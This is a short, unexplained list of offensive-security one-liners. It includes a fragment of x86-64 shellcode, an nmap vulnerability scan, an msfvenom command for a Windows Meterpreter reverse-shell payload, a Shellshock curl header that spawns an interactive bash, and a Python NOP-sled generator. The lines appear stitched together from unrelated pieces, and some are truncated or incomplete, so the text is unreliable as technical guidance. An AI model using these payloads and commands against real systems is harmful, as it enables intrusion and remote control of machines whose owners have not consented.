\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb
sudo nmap -sS -sV --script vuln 192.168.1.1
root@turnip29:~$ whoami
msfvenom -p windows/x64/meterpreter/reverse_tcp
curl -H 'User-Agent: () { :;}; /bin/bash -i' localhost
python -c 'print("\x90" * 32 + "\xcc\xcc\xcc\xcc")'